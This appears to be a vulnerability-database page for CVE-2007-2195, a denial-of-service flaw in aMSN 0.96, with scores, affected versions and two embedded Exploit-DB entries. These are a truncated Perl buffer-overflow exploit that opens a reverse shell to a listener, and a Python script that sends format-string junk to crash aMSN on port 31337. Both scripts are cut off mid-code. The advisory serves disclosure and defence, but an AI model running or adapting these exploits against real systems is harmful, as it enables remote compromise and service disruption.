CVE-2007-2195
published 2007-04-24CVE-2007-2195: aMSN (aka Alvaro's Messenger) 0.96 and earlier allows remote attackers to cause a denial of service (application crash) by sending invalid data to TCP port…
PriorityP419medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.34%
87.1th percentile
aMSN (aka Alvaro's Messenger) 0.96 and earlier allows remote attackers to cause a denial of service (application crash) by sending invalid data to TCP port 31337.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alvaro | alvaros_messenger | <= 0.96 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
exploitdb·2007-10-04
CVE-2007-5256 FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
---
# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
"
Exploit-DB
AMSN 0.96 - Malformed Message Denial of Service
exploitdb·2007-04-21
CVE-2007-2195 AMSN 0.96 - Malformed Message Denial of Service
AMSN 0.96 - Malformed Message Denial of Service
---
source: https://www.securityfocus.com/bid/23583/info
aMsn is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
This issue affects aMsn 0.96 and prior versions.
import socket
HOST = 'victim.com'
PORT = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
?!"?$%&/()=?`#+#-.,;:_??????%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
%n%n%n%n%n%n\????#?[{#?]?#\`~??')
---fuck off here---
I think it were the character '}', '{' or '%x', '%n'. Try to determ
2007-04-24
Published